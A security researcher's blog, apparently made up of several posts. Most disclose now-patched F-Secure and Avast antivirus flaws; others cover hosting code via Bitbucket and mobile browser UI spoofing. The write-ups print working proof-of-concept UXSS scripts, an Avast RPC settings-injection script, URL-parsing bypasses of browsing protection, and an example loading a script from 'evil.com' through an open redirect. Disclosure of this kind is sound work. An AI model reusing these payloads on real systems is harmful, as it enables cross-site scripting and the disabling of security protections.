Pwning your antivirus, part 3: the UXSS that wouldn't die

All right, time for another post in the series. This one's been in the works for a looong time; something like 9 months now. My previous post was about F-Secure SAFE for Mac, and where it left off, I intend to pick up here.

Information Leak in Browsing Protection APIs

I reported several bugs; here's important part of the report I started with in January, an Information Leak in F-Secure SAFE for Windows:

The vulnerability in question is in the Browsing Protection FS_SERVICE API and can be reproduced as follows: - Set up a web server to respond with a "200 OK" on - Edit your Windows hosts file to include the following line: www.google.igi.tl - Make sure Browsing Protection is enabled and the browser plugins installed. - Go to http://www.google.igi.tl/ in Chrome. You should see the page served by your local web server. - Open Chrome's dev console (Shift+Ctrl+J) and type the following: prefix_rsc_url - Hit enter, and you should see a URL containing a 32-character token.

The affected component, Browsing Protection, is basically a proxy that goes through your web traffic (non-TLS; TLS traffic is handled by a browser extension), blocks URLs known to be malicious, and injects some silly ranking code into search engine results pages. These injected code snippets access APIs that are protected with random 32-character authorization tokens.

The idea, of course, was to point out that that an authorization token could be accessed by a malicious origin. Which would then lead to the origin gaining access to F-Secure Browsing Protection APIs. Editing your hosts file wasn't part of the issue or in any way relevant; the same could have been done with a real DNS record, I just skipped that bit to make testing easier. Which I pointed out clearly in the same email:

The local web server and the hosts file entry are both obviously just for testing. A real attacker would have a real web server and a domain name pointing to it. Any short 2nd level domain name will do, as long as you create a "google" subdomain.

Not really an interesting bug, the only use I could immediately find for the Browsing Protection APIs was enumerating through a user's browser history. The response from F-Secure was exactly what you'd expect (emphasis mine):

With regards to the Information Leak through Browsing Protection for SAFE PC, our development team has investigated the issue and have concluded that it is not a vulnerability with Browsing Protection. We believe that if an attacker is able to modify the host file of a victim in the first place, there could be other methods to leak information rather than just through Browsing Protection. Having the ability to modify host file freely would also indicate that the machine has already been compromised using another method.


However if you are able to provide us a working PoC of leaking information about block page without modifying the host file, please do inform us for further investigation.

Ok, screw you, I own the domain I used in the example, so I'll just host a proper PoC there. Which I did. I also spent a few minutes to figure out what to do with the API access:

Here's a new and improved PoC for the information disclosure issue: http://www.google.igi.tl/anklfguoufgnnds/fsecure.html I've hosted it on my web server, so no hosts file modification required. What the PoC does is triggers banking mode and then abuses the resulting block pages to find out your Facebook profile URL.

The PoC is still live at the original URL, so you can check out the source code there. With the click of a button it would work out the URL to your Facebook profile, as long as you were logged in. Is that a vulnerability yet?

After this new PoC, it took F-Secure a month to respond with anything other than boilerplate. That was to inform me that a fix had been released, only to let me know in the next email that (paraphrasing here) "sorry, no, nothing was actually released, it was an error". The actual release came another month later, in April, and even then it did nothing to restrict access to the sensitive APIs: all they did was rename the fs_prefix_rsc_url variable to x (which did nothing) and change the block page IDs to random hashes (which actually made the specific exploit impossible, but only that). This fix was released as a Network Interception Framework Update—whatever that is—version 2016-04-04_01.

Universal XSS in Browsing Protection

Concurrently with the Information Leak reports, I discovered and reported a Cross-Site Scripting issue in the very same Browsing Protection component in F-Secure SAFE for Windows. Here's an excerpt of another report I sent in January:

1) Host the following HTML document on a web server. 2) Open it in a Chrome instance with Browsing Protection enabled. 3) Click on the "Do it!" button. 4) Observe XSS on google.com. <script> window.addEventListener("message", function (event) { location.href = event.data.replace(/^http:\/\/localhost:\d+\//, 'http://www.google.com/'); }); function doIt() { var w = window.open("https://kalantzis.net/#" + "';window.opener?" + "window.opener.postMessage(location.href,'*')" + ":alert('XSS\x20on\x20'+document.domain);'"); } </script> <button onclick="doIt()">Do it!</button> The HTML document above triggers XSS in the Browsing Protection block page, passes its URL back to the original script, then redirects to the same path on google.com, causing the same payload to be triggered there as well.

The PoC from above is also available here. The fun part in this one is of course that a simple XSS vulnerability in a Browsing Protection block page could be turned into Universal XSS and used against unsuspecting tragets like Google, Facebook, and any online bank of your choice. It only worked in Chrome, but that was mainly because I was being lazy and didn't bother with other browsers.

The script warrants some explanation, as at first glance it might not be obvious how it worked.

Clicking the button would open a new browser window and attempt to load https://kalantzis.net/. This is a known malware domain picked from malwaredomainlist.com, which means the attempt to access it would be blocked by Browsing Protection. Now, because kalantzis.net is accessed over HTTPS, not HTTP, it would not be caught by the F-Secure proxy server (apparently called the Network Interception Framework); instead the interception would handlend by a browser extension. Due to technical limitations, the browser extension can't display a block page in-place on the same domain, and has to redirect to one on an HTTP server running on localhost.

So, in effect, the button would open a generated localhost URL, which could be used to uniquely reference the particular block page of the original HTTP request. This block page would display the original URL that was blocked, and the code to display that URL contained a simple XSS vulnerability. The payload in the PoC would read the URL of the block page and pass it back to the original script, which would then trigger navigation to the same URL—with one difference: it would replace localhost with google.com. The same block page would still open, because now it would be loaded from the F-Secure proxy server ("Network Interception Framework"). The same XSS payload would be run a second time, only now on a Google origin, this time triggering an alert dialog.

F-Secure quickly acknowledged the issue, but again it took a couple of months before they would even comment on a potential release date. A "fix" was released together with the fix to the Information Leak vulnerability, in the same Network Interception Framework Update version 2016-04-04_01.

At this point they also let me know that they had decided on a bounty of 100 EUR for the Information Leak, and 500 EUR for the UXSS.

Parental Control Bypass, Markup Injection, and Universal XSS on Android

A little bit after reporting the Information Leak and XSS issues on Windows, I moved on to the Android platform; specifically, F-Secure Mobile Security. This report is from February:

These have been tested on Android 5.1.1 with F-Secure Mobile Security 15.4.012621 FS_GP. 1) Trivial bypass of Parental Control in Safe Browser: - Enable Parental Control and keep the default settings. - Open Safe Browser and navigate to https://m.facebook.com/ - A block page appears; navigation is not allowed. - Next, navigate to https://..@m.facebook.com/ - Navigation succeeds, and you should see the Facebook login page. The trick is prepending "..@" to the URL. This seems to work reliably with all URLs and is very simple to do, so even your kids would be able to do it.

Ok, not really interesting.

2) Markup injection in the block page in Safe Browser: - Enable Parental Control as before. - Open Safe Browser and navigate to: https://m.facebook.com/#<h1>markup</h1> - Notice the "markup" header on the page. The h1 tags are interpreted as HTML. This also works on the "non-Parental Control" block pages, i.e. malicious domains. In that case, Parental Control obviously doesn't have to be enabled. The output is filtered and no inline scripts or scripts from 3rd party origins are allowed. It would be possible to do content exfiltration using danging img tags, but the page doesn't seem to contain anything sensitive after the URL. This still leaves phishing, injecting subversive messages and the like. However, bypassing the filter is possible in certain situations; see #3.

The app would let through most HTML code as-is, but filtered anything that could have been used for XSS. Except when that was on the same origin.

3) XSS filter bypass using HTTP redirections, universal XSS: - Enable Parental Control as before. - Open Safe Browser and navigate to: https://platform.twitter.com/#<script src="https://platform.twitter.com/widgets.js"></script> - You should see a normal block page with the URL "https://platform.twitter.com/#" displayed on it. However, the script injected after it doesn't get filtered. You can verify that by inspecting the source code of the page, or typing the following in the address bar: javascript:alert("__twttr" in window); Now, being able to inject scripts hosted on the same origin isn't very useful, but consider this: what if the blocked service contains an open redirection vulnerability? E.g. if there was a URL like: https://platform.twitter.com/vulnerable-page?returnto=https://some.other/url ...and that URL would return a HTTP 302 redirection. Now it would be possible to turn that into a more severe Cross-Site Scripting vulnerability like so: https://platform.twitter.com/#<script src="https://platform.twitter.com/vulnerable-page?returnto=https://evil.com/malicious.js"></script> Combine this with the Parental Control bypass from #1, and you'd be able to abuse it just like a regular XSS vulnerability.

The PoC wasn't perfect because the Parental Control feature would only be triggered on specific websites, and I obviously didn't have an open redirection on twitter.com to demo with. But it seemed to be enough to get the idea across, which is what I was hoping for. These were all rather minor issues, because they would have been very difficult to exploit.

I got no response at all from F-Secure in over a month. Not even the standard boilerplate. Not until April, when they finally reacted and let me know that they are working on it.

The first fix came out in June. F-Secure told me they had fixed all three issues; however, only the first one was fixed. Both the Markup Injection and UXSS issues were reproducible in their original form. I reported this back to them, and an actual fix for for those two came out in September.

Bypassing the UXSS fix on Windows

After F-Secure's first attempt at fixing the UXSS vulnerability on Windows, I quickly submitted a bypass. The PoC code is live here, and as you can see, doesn't differ much from the original:

<script> function doIt() { var w = window.open("https://kalantzis.net/" + "';if(document.domain==='localhost')" + "location.href=location.href.replace(/localhost:[0-9]+/,'www.google.com');" + "alert(document.domain);'"); } </script> <button onclick="doIt()">Do it!</button>

The biggest difference is that the injection is now in a slightly different part of the URL, as the original fix was to not include URL fragments in the block page. Instead of, say, escaping stuff properly, which is what a sensible person would do.

A couple of days later, before F-Secure really even had time to react to this one, I submitted a third PoC for the same UXSS vulnerability. This was for two reasons. Firstly, the second PoC still didn't work on Firefox, but more importantly, I also wanted to demonstrate that the fix F-Secure had implemented for the Information Leak vulnerability was not sufficient.

The third UXSS PoC is here, and the way it worked was a bit different:

<html> <head> <script> function xss() { var payload = "alert('XSS on ' + document.domain)"; var target = "www.google.com"; var xhr = new XMLHttpRequest(); xhr.open("POST", x /* fs_prefix_rsc_url */ + "/httpsscan", false); xhr.send(JSON.stringify({ "url": "http://kalantzis.net/</scr" + "ipt><scr" + "ipt>" + payload + "</scr" + "ipt>", "rqtype": 1 })); location.href = JSON.parse(xhr.responseText) .redirect.replace(document.domain, target); } </script> </head> <body onload="xss()"></body> </html>

This PoC would directly access the same APIs that were exploited in the Information Leak PoCs. It would query the API for a block page URL, then redirect to that path on the target origin, fetching the vulnerable page from the F-Secure proxy server. Because the block page URL was passed in a JSON message and not through the URL bar, this would work equally well in all browsers.

This time the initial response from F-Secure was quick, and again they acknowledged the issue. Another three months of waiting followed, after which they pushed out another patch, F-Secure Network Interception Framework Update 2016-07-18_01. Literally 10 minutes of testing later, I countered with the fourth PoC:

<html> <head> <script> function xss() { var payload = "alert(&apos;XSS&nbsp;on&nbsp;&apos;+document.domain)"; var target = "www.google.com"; var xhr = new XMLHttpRequest(); xhr.open("POST", fs_prefix_rsc_url + "/httpsscan", false); xhr.send(JSON.stringify({ "url": "http://kalantzis.net/&lt;/scr" + "ipt&gt;&lt;iframe" + "/src=&quot;javascript:" + payload + "&quot;&gt;", "rqtype": 1 })); location.href = JSON.parse(xhr.responseText) .redirect.replace(document.domain, target); } </script> </head> <body onload="xss()"></body> </html>

Can you spot the difference? Two things changed compared to the third PoC; the payload is now escaped using HTML entities, and the variable used to access the F-Secure APIs has been renamed back to the original fs_prefix_rsc_url. Basically zero effort from F-Secure. At this point it had already been half a year since I initially reported the issue, so I started getting a bit tired and decided to set a deadline:

Starting from this moment, I'm giving you 60 days to implement and release a proper fix for the UXSS vulnerability on Windows. At the end of September I'm going to publish the details, regardless of whether you've managed to fix it or not. This is to motivate you to actually take this seriously, and the 60 days should be *plenty*, especially for something you've already worked on for this long. Now, since it seems you can't figure it out on your own, here's how you fix an XSS vulnerability: Step 1: Use context-aware escaping everywhere, on all untrusted input. Step 2: There is no step 2. This is the only way to do it. If you figure out some other way to do it, it is not actually a good way to do it. Do not do it any other way. You should have some in-house web application security expertise, so please put that into use. Get some of those people working on your QA.

And hey, results! The initial response was surprisingly positive, and about a month later they got back to me with something that actually sounded promising:

We have had our in-house software security experts working with the development team to fix the root cause of the issue. At the moment, the team has fixed the cause of UXSS and is currently still doing some improvements to the block page. We aim to have a new database release in 3 weeks (possibly the week of 12th September as it is going through the normal release and testing process).

And finally, another month later, week before the deadline in September:

We would like to inform you that a new database of F-Secure Network Interception Framework has been released yesterday with the version 2016-09-20_01. With that database release, the fix for UXSS is in place along with some additional improvements to the block page. We would llike you to kindly update the product database and verify the fixes that we deployed.

And yes, now they got it right! The deadline did wonders :)


The final fix for the UXSS was included in F-Secure Network Interception Framework database update version 2016-09-20_01. F-Secure decided not to release any advisories for any of the issues mentioned above.

In October F-Secure got back to me with some new decisions regarding bounties: 550 EUR for the vulnerabilities in F-Secure Mobile Security, and 1500 EUR for the UXSS, in addition to the 600 EUR already paid. That makes for a total of 2650 EUR for UXSS and a bunch of minor issues on two platforms.


Pwning your antivirus, part 2: even your Mac isn't SAFE

TL;DR F-Secure has patched multiple vulnerabilities in their SAFE for Mac antivirus product. The official advisory can be found here. As usual, this post focuses on the technical details from a bug hunter's perspective.

Poking around antivirus products is fun, mainly because they seem to be so terribly broken. So continuing with the theme from my last blog post, this time I looked at F-Secure SAFE for Mac, the consumer antivirus product from Finnish F-Secure, specifically the Browsing Protection component. As you can tell from the timeline at the end of this post, I actually started with this before I looked at Avast!, but this time no one else had beaten me to it, meaning getting everything fixed took a little bit longer.

Yeah, sure, the title might be exaggerating a bit. I just can't resist a good pun. If your auto-updates are working (mine actually weren't on one machine, or they might have been just a bit slow to propagate), you're totally safe. Even if you haven't got the update, none of the issues were all that bad in the end. The number of them and a few interesting features made it enough to warrant a blog post, though.

And yeah, "multiple issues" is always good.

Issue #1: Trivially triggering banking protection on non-banking websites.

The Browsing and Banking Protection features in F-Secure SAFE for Mac are implemented as a browser extension that interfaces with the native app using both nativeMessaging and a custom HTTP server running on localhost. I was looking specifically at the Chrome extension.

The extension listens to traffic using Chrome's webRequest APIs and reacts to different URLs based on a classification from F-Secure. In the case of Banking Protection, the software attempts to recognize online banks, then triggering a notification to tell the user they're on a trusted website and can safely go on with their business.

The thing is, when you're doing something like that, you want to make sure you're actually parsing URLs correctly. It can be surprisingly difficult sometimes.

So what about a URL like this one:


That's obviously pointing to example.com, only it has some cruft in the beginning. Well, op.fi is a Finnish bank, and %2f is the URL encoding for /. F-Secure SAFE was parsing the URL like so:

So op.fi is now the domain part and /@example.com/ the path. A tiny little mistake, but it meant Banking Protection would be triggered when visiting the link that's actually pointing to example.com.

Issue #2: Trivially bypassing Browsing Protection.

Browsing Protection in F-Secure SAFE works basically the same way as Banking Protection, only the other way around. The extension looks at the URL you're trying to browse to, then compares it to a blacklist, and blocks access if the URL is known to be malicious or otherwise not cool.

The idea is the same as in triggering the banking notification, and so shouldn't need much explanation:


kalantzis.net is a malware domain picked at random from Malware Domain List, and would normally trigger Browsing Protection. With x%2f@ at the beginning of the URL, however, the URL would be parsed incorrectly by F-Secure SAFE, and the Browsing Protection completely bypassed. The x part in the beginning didn't even have to be a real domain, just a single alphanumeric character would do.

Issue #3: Clickjacking.

Okay, this is a boring one. The Browsing Protection block page, served from the localhost HTTP server, had a button on it to allow whitelisting a blocked page. But it didn't implement any clickjacking protections, no X-Frame-Options, no framebusters. It would have been possible to embed the block page in a frame and trick someone into whitelisting pages.

Issue #4: UI spoofing in the whitelisting confirmation dialog.

When whitelisting a page by clicking the button on the Browsing Protection block page, F-Secure SAFE would display a native dialog window with an F-Secure logo and a confirmation message asking whether you're really sure. As part of that confirmation message, the URL about to be whitelisted would be displayed. The issue was with the software making no effort to encode whitespace character in the URL or to differentiate the URL from the static message. So take for example the following URL:

Triggering a whitelisting dialog for that URL, for example through clickjacking, would result in the following message being displayed in the native popup:
____________________________________________________________________ | | | Do you want to allow access to the following web address? | | (F) | | https://f-secure.com | | | | Trust me. It's totally legit. | | | | Allow Don't allow | |____________________________________________________________________|
The actual domain, kalantzis.net, would be pushed beyond the bottom edge of the dialog, with no way for the user to see it.

Issue #5: Bad practices, unsafe use of DOM APIs, almost useless authentication mechanism.

Finally, there was some terribly fragile code and bad practices in use throughout the software. There were no direct vulnerabilities caused by these as such, but apparently they still played a major part when determining the size of the bounty.

The bad practices included things like abundant use of innerHTML in JavaScript code, and some input sanitization that was just a bit iffy, but most worrying was probably the way the extension authenticated itself to the localhost HTTP server. There was a token named cookie (but not an actual HTTP cookie), obtained via nativeMessaging, what was passed to the HTTP server to authenticate requests. Only the length of the "cookie" was 8 hexadecimal digits. That's the same as 4 bytes, or a single 32-bit integer. Not a terribly difficult secret to guess.


The Browsing Protection bypass and Banking Protection spoof were fixed with a small change to the URL parsing. To protect agains clickjacking, some frame busting code was added. The UI spoof was fixed by disallowing unusual characters in the displayed URL, and the bad practices and miscellaneous issues were addressed as well, including the the short authentication token, whose length was increased significantly.

F-Secure decided to pay me a bounty of 1000 EUR, citing especially my pointing out the quality issues and fragile API as a factor that increased the bounty.



2016-01-12>Initial report
2016-01-14<Reply from F-Secure; investigating
2016-01-20<New release planned, ETA 6 weeks
2016-03-21>Request for a status update
2016-04-04<Fixes in testing, release within 2 weeks
2016-04-08<Fixes released on 2016-04-07; Decision to pay a bounty of 1000 EUR
2016-04-19>Verified the fix, asked about going public
2016-04-19<Advisory planned for 2016-04-26, ok to publish details once it's out
2016-04-21<Advisory pushed forward to 2016-05-03 due to "circumstances"
2016-05-03<Advisory published as FSC-2016-1


Pwning your antivirus, part 1: fun with Avast! RPC calls

Just yesterday, Tavis Ormandy from Google's Project Zero published some interesting findings he'd made in Avast antivirus. He had spotted an open RPC endpoint in one of the services, was able to figure out how to use it to launch the "Avastium" browser, an Avast fork of Chromium. He then went on to build an exploit for the browser, ending up with read access to the local filesystem.

This post is not about Tavis' findings. They're just a funny coincidence--if you can call a serious security issue funny. No, this post is about a closely related finding I made myself a couple of weeks ago, right before Avast managed to release a fix for it; or rather, a fix for the issues Tavis had identified, but also happened to fix this one.


If you've read my blog before, or otherwise know me, you'll know that I like to do a bit of hacking now and then. About two weeks ago I had the idea of making Avast's free antivirus software my next target. I noticed they had a bug bounty program, so if I actually found something, it'd be a total win-win. I grabbed the installer, set up the default installation, and started poking around.

I started by going through as much of the basic functionality as possible and mapping out an attack surface. I noticed Avast had a Chrome extension for things like content filtering and web reputation features. That became natural starting point for my first attempt: I've written Chrome extensions myself, so I'm familiar with the APIs and tools, and since they are mainly built with JavaScript and HTML, there's no need to break out IDA Pro right away.

Reading the code and observing network traffic, I quickly spotted a web server running on localhost:27275. It was used for passing data between the extension and the native "back-end" services. The protocol was some kind of a binary format wrapped in HTTP; as it turns out from Tavis' research, the exact format was binary protobuf. I didn't bother figuring out the exact protocol, as I found the content of the messages more interesting. I was seeing two types of messages:

Both were sent as POST requests to http://localhost:27275/command. The former seemed to just contain some kind of version information, and didn't appear very interesting. The latter, however, was very promising. I reversed the protocol enough to figure out that the first four bytes of the message contained a byte indicating an RPC command (position 0x01) and another indicating the length of the string parameter (positon 0x03). The bytes at positions 0x00 and 0x02 seemed to be constant, as did the two bytes at the end of the message.

This is where my findings start to differ from the ones Tavis made: he apparently decided to enumerate all the possible RPC commands to see if there was anything else available, whereas I immediately had my eye on the avastcfg:// part. I mean, it's some kind of a URI for accessing--and editing--the configuration of your antivirus software. There has to be something nasty you can do with it!

Turned out there wasn't. I looked up some configuration options and tried changing them via an RPC call, but none of it worked. The calls were being validated in the native code, and only changing that one property was allowed. And the property being something about sharing data with Avast, it wasn't very interesting.

There was something interesting though: even though the name of the configuration property was being validated, the value wasn't! I was able to set avastcfg://avast5/Common/PropertyDataSharing=foo, then query for the value, and get foo back! Still not much, though, as long as the value was handled otherwise correctly.

I remembered seeing an option earlier for exporting your Avast configuration to a file. Maybe I could get an invalid PropertyDataSharing value exported to a file, and then trigger something when the same file was imported back to Avast. Getting a bit complicated and hard to exploit, I know, but it's still something. I figured I'd have a go.

The Avast export format is a .zip archive with a bunch of .ini configuration files in it. And as I'd thought, the PropertyDataSharing value was stored inside one of them, even when it was set to something bogus. Now, what would happen if I injected a newline into the value?

Success! Newlines weren't being encoded or escaped in any way inside .ini files. I was able to set arbitrary properties in the exported configs, and importing them back to Avast worked too! It was still pretty difficult to exploit, though.

After I'd exported and imported some crafted values a couple of times in a row, I noticed something strange: some of the configuration settings I'd injected started to appear in the exported file way more times in a row than they should have. It was like the import wasn't the only phase where they got injected. In fact, exporting and importing the configuration wasn't necessary at all! Apparently Avast was using the same .ini format internally, and had the same issue there! So now I was able to change arbitrary settings in Avast simply by handing the victim a malicious link. All that was left was building a nice PoC that would handle it automatically:

<script> var payload = "NetAlert=SMTP:attacker@example.com"; var url = "http://localhost:27275/command"; var message = "avastcfg://avast5/Common/PropertyDataSharing=0" + "\r\n" + payload; message = message.split("").map(function (s) { return s.charCodeAt(0); }); message = [ 0x08, 0x0e, 0x12, message.length ].concat(message); message = message.concat([ 0x18, 0x03 ]); message = new Uint8Array(message); var xhr = new XMLHttpRequest(); xhr.open("POST", url, false); xhr.send(message); </script>

The script above makes a cross-origin XMLHttpRequest to the RPC endpoint and configures an SMTP alert. Changing the payload, it should be possible to do pretty much anything you can from the Avast UI. Pretty neat, huh?

I reached out to Avast with the PoC, and quickly got a reply. They stated they were aware that the localhost HTTP server has issues; someone (Tavis) had reported a similar vulnerability in December. A fix was already planned and ready, and a release scheduled for about a week from then! Easily the quickest reaction from a vendor I've ever seen, even if they did have a head start!

Even though they were already aware of the issues with the RPC endpoint, the newline injection part was new to them. They decided on a $2000 bounty, which is not bad at all for an evening of messing around with some HTTP APIs. All in all, the response was great, and the issue is now fixed. If you're running Avast, I suggest installing the update ASAP.


2016-01-24>Initial report
2016-01-26<Acknowledgement from Avast; related issue reported in December, already fixed
2016-01-26>Clarified that the issue is currently exploitable in the latest release
2016-01-26<Confirmation that the fix has not been released yet
2016-02-02<Decision to pay a bounty of $2000
2016-02-03>Request for a status update on the fix
2016-02-04<Issue fixed, ok to publish details


Publishing server-side code with Git and Bitbucket

As a security researcher with a background in software development, I write lots and lots of code. Most of it takes the form of small and fairly short-lived scripts: proofs-of-concept, quick demos, and highly specific single-purpose tools. And with my platform of choice being the web, I often need to host that code somewhere. Sometimes localhost might be enough, but if I want to show my demo to someone else, it won't do. And for some things you just need a public URL for them to work.

With client-side code, I might head for JSFiddle or CodePen, especially if my need is just sharing a demo with someone on the other side of the planet. But both of them are pretty terrible if you need to do anything even slightly more complicated, and they quickly become unusable if your code is something that's actually designed to break things. Iframes tend to interfere with demo code, CodePen likes to update pages automatically, which break things, and you just can't use JSFiddle at all on mobile. For some types of things they're fine, though.

For my larger projects' source code repositories my choice has for a while now been Bitbucket, simply because they give you an unlimited number of private repositories for free. I like Git, but the thing with Bitbucket is, it's just for source code.

Well, actually, it's not. You can also host static websites on Bitbucket as well, just like you can on GitHub Pages. That's already way better than using one of the JavaScript playground websites; you get to use your own code editor, can publish with a simple git push, and as a bonus, automatically get changelogs of everything you do. But it still won't run server-side code, and Bitbucket also injects JavaScript into your HTML pages to do analytics, which is just as bad as all the iframe stuff on the playground websites.

If you want to run server-side code, really the only choice is getting proper web hosting.

I've had cheap PHP hosting for a while already, but I never really put it into any use. Previously I had a static website in place of this blog and used the hosting for that. I would have used it to host my code snippets, except for one issue: uploading stuff was a serious pain. The archaic web UI from some time before the era of Web 1.0—possibly written by the same people who brought us the 1994 version of Microsoft.com—was the worst piece of UX I've ever come across. If only there were a better way.

If only I could sync my Bitbucket repo with the web hosting service.

Turns out Bitbucket has a pretty decent API. Basically every single piece of data is behind a simple HTTP request, from repository details to SSH keys to user account details. Authentication is done with either OAuth or HTTP Basic, and public data can be accessed with no authentication at all. Multiple response formats. No special API keys or any other weirdness required.

My need was extremely simple, and after a quick search through the API methods I had exactly what I wanted:

GET repositories/{accountname}/{repo_slug}/src/{revision}/{path}

To keep things simple I decided to go with the HTTP Basic authentication. I created a new repository and a fresh Bitbucket account to use with the API, and gave the new account read-only access to the repo. After that, all I had left was setting up a subdomain for the site and typing out a few lines of PHP.

I used mod_rewrite to map request paths to a GET parameter. Then, after a couple of lines of input validation, the API call:

$response = file_get_contents("https://$USER:$PASS@bitbucket.org/api/1.0/repositories/$REPO/src/master/$path");

Parse the response, map the file extension to a MIME type, add some simple caching, and voilà! All in no more than 65 lines of code. The result can be seen at lab.igi.tl. There's not much there right now, of course, but in the future it'll become the home for a whole lot of interesting code snippets.


More on mobile: Spoofing the address bar with CVE-2014-1527

Continuing with the theme from my previous post, early last year I came across and reported CVE-2014-1527, also known as MFSA 2014-40. An issue affecting the Android version of the Firefox web browser, it made it possible to prevent the address bar from re-emerging after being hidden by a user action such as scrolling. This could have allowed a remote attacker to deploy a full address bar spoof simply using HTML and CSS to construct their own fake version of the browser UI.

And again the cause boiled down to a simple usability feature, a workaround for the issue of not-enough-screen-estate: To save space, most mobile browsers automatically hide the address bar along with all security indicators when they aren't being actively used. Doing something like that properly is tricky.

The really interesting part, though: An almost identical issue also affected Chrome for Android. And it still does. The bug ticket was closed as a WontFix, because, according to the developers, it was like that by design:

The fact that the toolbar is spoofable on mobile has been a conscious decision. The situation isn't going to change unless/until we generally revisit how the mobile toolbar UI works. Although this makes me sad, que será será (for now).

That's right, the address bar in Chrome for Android was consciously designed to be spoofable. A strange design decision if you ask me, but hey, usability first.


CVE-2015-1261 and the state of modern mobile browser UIs

Usability is a notoriously difficult problem on mobile devices. The screen estate is extremely limited, buttons have to be large to make them touch-friendly, there's always a finger or two in the way, and still the user expects a more straight-forward experience than on the desktop. Developers also tend to prioritize usability over things like, say, security—which leads to all kinds of interesting problems.

For example, at the moment, it's not possible to view the details of an SSL server certificate in the stable release of Google Chrome for Android. It used to be, sure, but the feature was removed because it wasn't usable. It was replaced with a page info popup that adds noting you couldn't already see from the omnibox: it simply states the current URL and whether or not Chrome considers the server's SSL certificate valid. Nothing else.

And, because of CVE-2015-1261, it was a bit worse than nothing. Because, well, you could do this:

The screenshot above is from Chrome for Android version 40, showing the page info popup. That's the popup window that opens when you tap on the green lock on an SSL-protected page. And in case it isn't obvious, the entire "warning" part is arbitrary attacker-injected content. Including the icons. Here's what was happening:

Normally, Chrome will encode all special characters, like spaces and newlines, if you try to enter them in a URL. They just turn into %20s, %0As, %0Ds, and the like, automatically. There's an exception to that, though; the fragment part. No extra encoding is done on anything passed in the URL fragment, so it's really easy to mess something up.

Well, in Chrome, they messed it up in the page info popup. The URL was shown as-is and allowed to wrap, and the popup even displayed emoji correctly. That's what the "danger" icons are, emoji. The same annoying little faces you use on WhatsApp. So just by manipulating the URL fragment of the open web page you could inject arbitrary text and icons into a part of the native browser UI. A keen user might be suspicious of the slightly-lighter-than-normal font color, but that's definitely not something to rely on.

I worked together with Chrome developers and this issue was ultimately fixed in Chrome for Android version 43, which has been out for a while now. The way I see it, though, this was a part of a larger, more fundamental issue. The URL of the current page was allowed to wrap and was not separated clearly enough from genuine browser UI messages because of the basic usability problems of mobile devices: not enough screen estate and a requirement for an oversimplified user experience.

Certainly not easy problems to solve—I, for one, have no solutions to offer—but it pays to keep in mind that the compromises often made to work around them have implications on security as well.